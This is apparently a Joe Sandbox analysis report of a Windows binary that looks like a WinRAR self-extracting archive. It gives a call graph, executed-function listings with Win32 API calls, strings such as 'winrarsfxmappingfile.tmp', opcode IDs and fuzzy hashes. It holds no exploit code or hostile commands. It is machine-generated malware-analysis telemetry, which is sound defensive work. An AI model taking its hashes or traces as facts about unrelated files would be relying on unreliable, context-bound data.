___vcrt_FlsFree 25064->25095 25065->25046 25067->25048 25074 7e3c0d 25068->25074 25071 7e3d7e InitializeCriticalSectionAndSpinCount 25072 7e3d69 25071->25072 25072->25054 25073->25057 25075 7e3c26 25074->25075 25076 7e3c4f 25074->25076 25075->25076 25081 7e3b72 25075->25081 25076->25071 25076->25072 25079 7e3c3b GetProcAddress 25079->25076 25080 7e3c49 25079->25080 25080->25076 25082 7e3b7e ___vcrt_FlsFree 25081->25082 25083 7e3bf3 25082->25083 25084 7e3b95 LoadLibraryExW 25082->25084 25088 7e3bd5 LoadLibraryExW 25082->25088 25083->25076 25083->25079 25085 7e3bfa 25084->25085 25086 7e3bb3 GetLastError 25084->25086 25085->25083 25087 7e3c02 FreeLibrary 25085->25087 25086->25082 25087->25083 25088->25082 25088->25085 25090 7e3c0d ___vcrt_FlsFree 5 API calls 25089->25090 25091 7e3c71 25090->25091 25092 7e3c8a TlsAlloc 25091->25092 25093 7e2b96 25091->25093 25093->25062 25094 7e3d08 6 API calls ___vcrt_FlsFree 25093->25094 25094->25064 25095->25062 25097 7ec073 25096->25097 25098 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25097->25098 25099 7deefe 25098->25099 25099->24973 25099->25052 25101 7dec50 25100->25101 25102 7d086d GetModuleHandleW 25101->25102 25103 7d0888 GetProcAddress 25102->25103 25104 7d08e7 25102->25104 25106 7d08b9 GetProcAddress 25103->25106 25107 7d08a1 25103->25107 25105 7d0c14 GetModuleFileNameW 25104->25105 25205 7e75fb 42 API calls __vsnwprintf_l 25104->25205 25116 7d0c32 25105->25116 25108 7d08cb 25106->25108 25107->25106 25108->25104 25110 7d0b54 25110->25105 25111 7d0b5f GetModuleFileNameW CreateFileW 25110->25111 25112 7d0b8f SetFilePointer 25111->25112 25113 7d0c08 CloseHandle 25111->25113 25112->25113 25114 7d0b9d ReadFile 25112->25114 25113->25105 25114->25113 25118 7d0bbb 25114->25118 25119 7d0c94 GetFileAttributesW 25116->25119 25121 7d0c5d CompareStringW 25116->25121 25122 7d0cac 25116->25122 25196 7cb146 25116->25196 25199 7d081b 25116->25199 25118->25113 25120 7d081b 2 API calls 25118->25120 25119->25116 25119->25122 25120->25118 25121->25116 25123 7d0cb7 25122->25123 25125 7d0cec 25122->25125 25126 7d0cd0 GetFileAttributesW 25123->25126 25127 7d0ce8 25123->25127 25124 7d0dfb 25148 7da64d GetCurrentDirectoryW 25124->25148 25125->25124 25128 7cb146 GetVersionExW 25125->25128 25126->25123 25126->25127 25127->25125 25129 7d0d06 25128->25129 25130 7d0d0d 25129->25130 25131 7d0d73 25129->25131 25133 7d081b 2 API calls 25130->25133 25132 7c4092 _swprintf 51 API calls 25131->25132 25134 7d0d9b AllocConsole 25132->25134 25135 7d0d17 25133->25135 25136 7d0da8 GetCurrentProcessId AttachConsole 25134->25136 25137 7d0df3 ExitProcess 25134->25137 25138 7d081b 2 API calls 25135->25138 25206 7e3e13 25136->25206 25140 7d0d21 25138->25140 25142 7ce617 53 API calls 25140->25142 25141 7d0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25141->25137 25143 7d0d3c 25142->25143 25144 7c4092 _swprintf 51 API calls 25143->25144 25145 7d0d4f 25144->25145 25146 7ce617 53 API calls 25145->25146 25147 7d0d5e 25146->25147 25147->25137 25148->24990 25150 7d081b 2 API calls 25149->25150 25151 7dac2a OleInitialize 25150->25151 25152 7dac4d GdiplusStartup SHGetMalloc 25151->25152 25152->24992 25157 7dc5ce 25153->25157 25154 7dc6e4 25154->25001 25154->25002 25155 7d1fac CharUpperW 25155->25157 25157->25154 25157->25155 25208 7cf3fa 82 API calls 2 library calls 25157->25208 25159 7dec50 25158->25159 25160 7ddbeb SetEnvironmentVariableW 25159->25160 25162 7ddc0e 25160->25162 25161 7ddc36 25161->24995 25162->25161 25163 7ddc2a SetEnvironmentVariableW 25162->25163 25163->25161 25165 7db6fe 25164->25165 25166 7db70b GetObjectW 25164->25166 25209 7da6c2 FindResourceW 25165->25209 25167 7db71a 25166->25167 25169 7da5c6 4 API calls 25167->25169 25171 7db72d 25169->25171 25172 7db770 25171->25172 25173 7db74c 25171->25173 25174 7da6c2 12 API calls 25171->25174 25183 7cda42 25172->25183 25223 7da605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25173->25223 25176 7db73d 25174->25176 25176->25173 25178 7db743 DeleteObject 25176->25178 25177 7db754 25224 7da5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25177->25224 25178->25173 25180 7db75d 25225 7da80c 8 API calls 25180->25225 25182 7db764 DeleteObject 25182->25172 25234 7cda67 25183->25234 25188 7d90b7 25189 7deb38 8 API calls 25188->25189 25190 7d90d6 25189->25190 25190->25014 25192 7dacab GdiplusShutdown OleUninitialize 25191->25192 25192->25030 25194->25021 25195->25029 25197 7cb15a GetVersionExW 25196->25197 25198 7cb196 25196->25198 25197->25198 25198->25116 25200 7dec50 25199->25200 25201 7d0828 GetSystemDirectoryW 25200->25201 25202 7d085e 25201->25202 25203 7d0840 25201->25203 25202->25116 25204 7d0851 LoadLibraryW 25203->25204 25204->25202 25205->25110 25207 7e3e1b 25206->25207 25207->25141 25207->25207 25208->25157 25210 7da7d3 25209->25210 25211 7da6e5 SizeofResource 25209->25211 25210->25166 25210->25167 25211->25210 25212 7da6fc LoadResource 25211->25212 25212->25210 25213 7da711 LockResource 25212->25213 25213->25210 25214 7da722 GlobalAlloc 25213->25214 25214->25210 25215 7da73d GlobalLock 25214->25215 25216 7da7cc GlobalFree 25215->25216 25217 7da74c __InternalCxxFrameHandler 25215->25217 25216->25210 25218 7da7c5 GlobalUnlock 25217->25218 25226 7da626 GdipAlloc 25217->25226 25218->25216 25221 7da79a GdipCreateHBITMAPFromBitmap 25222 7da7b0 25221->25222 25222->25218 25223->25177 25224->25180 25225->25182 25227 7da638 25226->25227 25228 7da645 25226->25228 25230 7da3b9 25227->25230 25228->25218 25228->25221 25228->25222 25231 7da3da GdipCreateBitmapFromStreamICM 25230->25231 25232 7da3e1 GdipCreateBitmapFromStream 25230->25232 25233 7da3e6 25231->25233 25232->25233 25233->25228 25235 7cda75 _wcschr __EH_prolog 25234->25235 25236 7cdaa4 GetModuleFileNameW 25235->25236 25237 7cdad5 25235->25237 25238 7cdabe 25236->25238 25280 7c98e0 25237->25280 25238->25237 25240 7cdb31 25291 7e6310 25240->25291 25241 7c959a 80 API calls 25244 7cda4e 25241->25244 25243 7ce261 78 API calls 25246 7cdb05 25243->25246 25278 7ce29e GetModuleHandleW FindResourceW 25244->25278 25245 7cdb44 25247 7e6310 26 API calls 25245->25247 25246->25240 25246->25243 25258 7cdd4a 25246->25258 25255 7cdb56 ___vcrt_FlsFree 25247->25255 25248 7cdc85 25248->25258 25311 7c9d70 81 API calls 25248->25311 25250 7c9e80 79 API calls 25250->25255 25252 7cdc9f ___std_exception_copy 25253 7c9bd0 82 API calls 25252->25253 25252->25258 25256 7cdcc8 ___std_exception_copy 25253->25256 25255->25248 25255->25250 25255->25258 25305 7c9bd0 25255->25305 25310 7c9d70 81 API calls 25255->25310 25256->25258 25275 7cdcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 25256->25275 25312 7d1b84 MultiByteToWideChar 25256->25312 25258->25241 25259 7ce159 25263 7ce1de 25259->25263 25318 7e8cce 26 API calls ___std_exception_copy 25259->25318 25261 7ce16e 25319 7e7625 26 API calls ___std_exception_copy 25261->25319 25264 7ce214 25263->25264 25268 7ce261 78 API calls 25263->25268 25269 7e6310 26 API calls 25264->25269 25266 7ce1c6 25320 7ce27c 78 API calls 25266->25320 25268->25263 25270 7ce22d 25269->25270 25271 7e6310 26 API calls 25270->25271 25271->25258 25274 7d1da7 WideCharToMultiByte 25274->25275 25275->25258 25275->25259 25275->25274 25313 7ce5b1 50 API calls __vsnprintf 25275->25313 25314 7e6159 26 API calls 3 library calls 25275->25314 25315 7e8cce 26 API calls ___std_exception_copy 25275->25315 25316 7e7625 26 API calls ___std_exception_copy 25275->25316 25317 7ce27c 78 API calls 25275->25317 25279 7cda55 25278->25279 25279->25188 25281 7c98ea 25280->25281 25282 7c994b CreateFileW 25281->25282 25283 7c996c GetLastError 25282->25283 25287 7c99bb 25282->25287 25284 7cbb03 GetCurrentDirectoryW 25283->25284 25285 7c998c 25284->25285 25286 7c9990 CreateFileW GetLastError 25285->25286 25285->25287 25286->25287 25289 7c99b5 25286->25289 25288 7c99ff 25287->25288 25290 7c99e5 SetFileTime 25287->25290 25288->25246 25289->25287 25290->25288 25292 7e6349 25291->25292 25293 7e634d 25292->25293 25304 7e6375 25292->25304 25321 7e91a8 20 API calls _abort 25293->25321 25295 7e6699 25297 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25295->25297 25296 7e6352 25322 7e9087 26 API calls ___std_exception_copy 25296->25322 25299 7e66a6 25297->25299 25299->25245 25300 7e635d 25301 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25300->25301 25303 7e6369 25301->25303 25303->25245 25304->25295 25323 7e6230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25304->25323 25307 7c9bdc 25305->25307 25308 7c9be3 25305->25308 25306 7c9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25306->25308 25307->25255 25308->25306 25308->25307 25324 7c6d1a 77 API calls 25308->25324 25310->25255 25311->25252 25312->25275 25313->25275 25314->25275 25315->25275 25316->25275 25317->25275 25318->25261 25319->25266 25320->25263 25321->25296 25322->25300 25323->25304 25324->25308 25326 7e7ce1 _abort 25325->25326 25327 7e7cfa 25326->25327 25328 7e7ce8 25326->25328 25349 7eac31 EnterCriticalSection 25327->25349 25361 7e7e2f GetModuleHandleW 25328->25361 25331 7e7ced 25331->25327 25362 7e7e73 GetModuleHandleExW 25331->25362 25332 7e7d9f 25350 7e7ddf 25332->25350 25336 7e7d76 25341 7e7d8e 25336->25341 25342 7e8a91 _abort 5 API calls 25336->25342 25338 7e7d01 25338->25332 25338->25336 25370 7e87e0 20 API calls _abort 25338->25370 25339 7e7dbc 25353 7e7dee 25339->25353 25340 7e7de8 25371 7f2390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25340->25371 25343 7e8a91 _abort 5 API calls 25341->25343 25342->25341 25343->25332 25349->25338 25372 7eac81 LeaveCriticalSection 25350->25372 25352 7e7db8 25352->25339 25352->25340 25373 7eb076 25353->25373 25356 7e7e1c 25359 7e7e73 _abort 8 API calls 25356->25359 25357 7e7dfc GetPEB 25357->25356 25358 7e7e0c GetCurrentProcess TerminateProcess 25357->25358 25358->25356 25360 7e7e24 ExitProcess 25359->25360 25361->25331 25363 7e7e9d GetProcAddress 25362->25363 25364 7e7ec0 25362->25364 25367 7e7eb2 25363->25367 25365 7e7ecf 25364->25365 25366 7e7ec6 FreeLibrary 25364->25366 25368 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25365->25368 25366->25365 25367->25364 25369 7e7cf9 25368->25369 25369->25327 25370->25336 25372->25352 25374 7eb09b 25373->25374 25378 7eb091 25373->25378 25375 7eac98 _abort 5 API calls 25374->25375 25375->25378 25376 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25377 7e7df8 25376->25377 25377->25356 25377->25357 25378->25376 25488 7c6faa 111 API calls 3 library calls 25489 7deda7 48 API calls _unexpected 25439 7ddca1 DialogBoxParamW 25490 7df3a0 27 API calls 25442 7ea4a0 71 API calls _free 25443 7ea6a0 31 API calls 2 library calls 25444 7f08a0 IsProcessorFeaturePresent 25491 7db18d 78 API calls 25446 7dc793 97 API calls 4 library calls 25448 7dc793 102 API calls 5 library calls 25494 7d9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte

                                                                      Executed Functions

                                                                      Function 007DDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 007D0863: GetModuleHandleW.KERNEL32(kernel32), ref: 007D087C
                                                                        • Part of subcall function 007D0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007D088E
                                                                        • Part of subcall function 007D0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007D08BF
                                                                        • Part of subcall function 007DA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 007DA655
                                                                        • Part of subcall function 007DAC16: OleInitialize.OLE32(00000000), ref: 007DAC2F
                                                                        • Part of subcall function 007DAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 007DAC66
                                                                        • Part of subcall function 007DAC16: SHGetMalloc.SHELL32(00808438), ref: 007DAC70
                                                                      • GetCommandLineW.KERNEL32 ref: 007DDF5C
                                                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 007DDF83
                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 007DDF94
                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 007DDFCE
                                                                        • Part of subcall function 007DDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 007DDBF4
                                                                        • Part of subcall function 007DDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 007DDC30
                                                                      • CloseHandle.KERNEL32(00000000), ref: 007DDFD7
                                                                      • GetModuleFileNameW.KERNEL32(00000000,0081EC90,00000800), ref: 007DDFF2
                                                                      • SetEnvironmentVariableW.KERNEL32(sfxname,0081EC90), ref: 007DDFFE
                                                                      • GetLocalTime.KERNEL32(?), ref: 007DE009
                                                                      • _swprintf.LIBCMT ref: 007DE048
                                                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 007DE05A
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 007DE061
                                                                      • LoadIconW.USER32(00000000,00000064), ref: 007DE078
                                                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 007DE0C9
                                                                      • Sleep.KERNEL32(?), ref: 007DE0F7
                                                                      • DeleteObject.GDI32 ref: 007DE130
                                                                      • DeleteObject.GDI32(?), ref: 007DE140
                                                                      • CloseHandle.KERNEL32 ref: 007DE183
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                      • API String ID: 3049964643-2656992072
                                                                      • Opcode ID: 9f42eab27d34eaaa97d055c5b4e6235a8c92eb753bb05b2f32572032f9e89e59
                                                                      • Instruction ID: 68418484a9298de9084fa5364983144e473f2ecf33799da330b9518518a0b2e5
                                                                      • Opcode Fuzzy Hash: 9f42eab27d34eaaa97d055c5b4e6235a8c92eb753bb05b2f32572032f9e89e59
                                                                      • Instruction Fuzzy Hash: BF61C171608609EBD320ABA4EC4DF6B7BBCFB45710F00442BFA45963A1EB7C9944C7A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DA6C2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 888 7da6c2-7da6df FindResourceW 889 7da7db 888->889 890 7da6e5-7da6f6 SizeofResource 888->890 891 7da7dd-7da7e1 889->891 890->889 892 7da6fc-7da70b LoadResource 890->892 892->889 893 7da711-7da71c LockResource 892->893 893->889 894 7da722-7da737 GlobalAlloc 893->894 895 7da73d-7da746 GlobalLock 894->895 896 7da7d3-7da7d9 894->896 897 7da7cc-7da7cd GlobalFree 895->897 898 7da74c-7da76a call 7e0320 895->898 896->891 897->896 902 7da76c-7da78e call 7da626 898->902 903 7da7c5-7da7c6 GlobalUnlock 898->903 902->903 908 7da790-7da798 902->908 903->897 909 7da79a-7da7ae GdipCreateHBITMAPFromBitmap 908->909 910 7da7b3-7da7c1 908->910 909->910 911 7da7b0 909->911 910->903 911->910
                                                                      APIs
                                                                      • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,007DB73D,00000066), ref: 007DA6D5
                                                                      • SizeofResource.KERNEL32(00000000,?,?,?,007DB73D,00000066), ref: 007DA6EC
                                                                      • LoadResource.KERNEL32(00000000,?,?,?,007DB73D,00000066), ref: 007DA703
                                                                      • LockResource.KERNEL32(00000000,?,?,?,007DB73D,00000066), ref: 007DA712
                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,007DB73D,00000066), ref: 007DA72D
                                                                      • GlobalLock.KERNEL32(00000000,?,?,?,?,?,007DB73D,00000066), ref: 007DA73E
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 007DA7C6
                                                                        • Part of subcall function 007DA626: GdipAlloc.GDIPLUS(00000010), ref: 007DA62C
                                                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 007DA7A7
                                                                      • GlobalFree.KERNEL32(00000000), ref: 007DA7CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                      • String ID: PNG
                                                                      • API String ID: 541704414-364855578
                                                                      • Opcode ID: c0b88e0081f1c3f0872060bb7c402ad57c80b26e63ffbced7c3420f7ab8811e4
                                                                      • Instruction ID: 6b17957302e1fe8da842533a478541104f21bca0f7772b16166f9161890d97e9
                                                                      • Opcode Fuzzy Hash: c0b88e0081f1c3f0872060bb7c402ad57c80b26e63ffbced7c3420f7ab8811e4
                                                                      • Instruction Fuzzy Hash: 17317C75600706FFDB109F21EC88D2BBBB9FF84770B04451AF90582320EB39D944DAA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CA69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1041 7ca69b-7ca6bf call 7dec50 1044 7ca727-7ca730 FindNextFileW 1041->1044 1045 7ca6c1-7ca6ce FindFirstFileW 1041->1045 1046 7ca742-7ca7ff call 7d0602 call 7cc310 call 7d15da * 3 1044->1046 1047 7ca732-7ca740 GetLastError 1044->1047 1045->1046 1048 7ca6d0-7ca6e2 call 7cbb03 1045->1048 1052 7ca804-7ca811 1046->1052 1049 7ca719-7ca722 1047->1049 1056 7ca6fe-7ca707 GetLastError 1048->1056 1057 7ca6e4-7ca6fc FindFirstFileW 1048->1057 1049->1052 1059 7ca709-7ca70c 1056->1059 1060 7ca717 1056->1060 1057->1046 1057->1056 1059->1060 1062 7ca70e-7ca711 1059->1062 1060->1049 1062->1060 1064 7ca713-7ca715 1062->1064 1064->1049
                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,007CA592,000000FF,?,?), ref: 007CA6C4
                                                                        • Part of subcall function 007CBB03: _wcslen.LIBCMT ref: 007CBB27
                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,007CA592,000000FF,?,?), ref: 007CA6F2
                                                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,007CA592,000000FF,?,?), ref: 007CA6FE
                                                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,007CA592,000000FF,?,?), ref: 007CA728
                                                                      • GetLastError.KERNEL32(?,?,?,?,007CA592,000000FF,?,?), ref: 007CA734
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                      • String ID:
                                                                      • API String ID: 42610566-0
                                                                      • Opcode ID: ed1e9d8a8679618d47be9c679064b790230d5ad25092139fc461b6b6c4e79c65
                                                                      • Instruction ID: bed0503e9eb71ccab5363585f4730bd9281f4545d2774090a3cf0619d057d022
                                                                      • Opcode Fuzzy Hash: ed1e9d8a8679618d47be9c679064b790230d5ad25092139fc461b6b6c4e79c65
                                                                      • Instruction Fuzzy Hash: A3416072500519ABCB25DF64CC88BE9B7B8FB48355F14419AE56DE3200D738AE90CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(?,?,007E7DC4,?,007FC300,0000000C,007E7F1B,?,00000002,00000000), ref: 007E7E0F
                                                                      • TerminateProcess.KERNEL32(00000000,?,007E7DC4,?,007FC300,0000000C,007E7F1B,?,00000002,00000000), ref: 007E7E16
                                                                      • ExitProcess.KERNEL32 ref: 007E7E28
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: 07d54d8d5a81fc4fb7118a4e502eb9a76a59f8337ba845f0835968e9f76b1359
                                                                      • Instruction ID: 72ee813c1dde05055c95cd6bd886a1adc86391f15366bb8fb7bdac96b2ae5f52
                                                                      • Opcode Fuzzy Hash: 07d54d8d5a81fc4fb7118a4e502eb9a76a59f8337ba845f0835968e9f76b1359
                                                                      • Instruction Fuzzy Hash: C6E0BF31005598EBCF156F55DD0E95A7F6AEF54341B008495F8158A132CB3DEE51CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: bb365d0f5b4db49b79ccd19179d090ebf6c11ab230fd4fc5ecc5f71534523797
                                                                      • Instruction ID: 1eae1b18d34432e02001e9a56acd7d45aabe0b2aed9b2bc083c8deda6590bece
                                                                      • Opcode Fuzzy Hash: bb365d0f5b4db49b79ccd19179d090ebf6c11ab230fd4fc5ecc5f71534523797
                                                                      • Instruction Fuzzy Hash: 05822C70904245EEDF65DF64C885FFAB7B9BF05300F0841BEE9499B242DB385A84CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D6CDC Relevance: .3, Instructions: 343COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 63a80e35a56d544f1db8c1d16e01ffd0d853c5f229beee116b562679b10072d3
                                                                      • Instruction ID: 79c6ca691b853107995c94a7fad3a9b3d67dfce989c92396baa330ab2e5adff5
                                                                      • Opcode Fuzzy Hash: 63a80e35a56d544f1db8c1d16e01ffd0d853c5f229beee116b562679b10072d3
                                                                      • Instruction Fuzzy Hash: 4FD1C6B16083448FDB14CF28C88475BBBF1BF89318F08456EE9899B342E778E905CB56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DB7E0 Relevance: 107.5, APIs: 48, Strings: 13, Instructions: 731windowfilesleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007DB7E5
                                                                        • Part of subcall function 007C1316: GetDlgItem.USER32(00000000,00003021), ref: 007C135A
                                                                        • Part of subcall function 007C1316: SetWindowTextW.USER32(00000000,007F35F4), ref: 007C1370
                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 007DB8D1
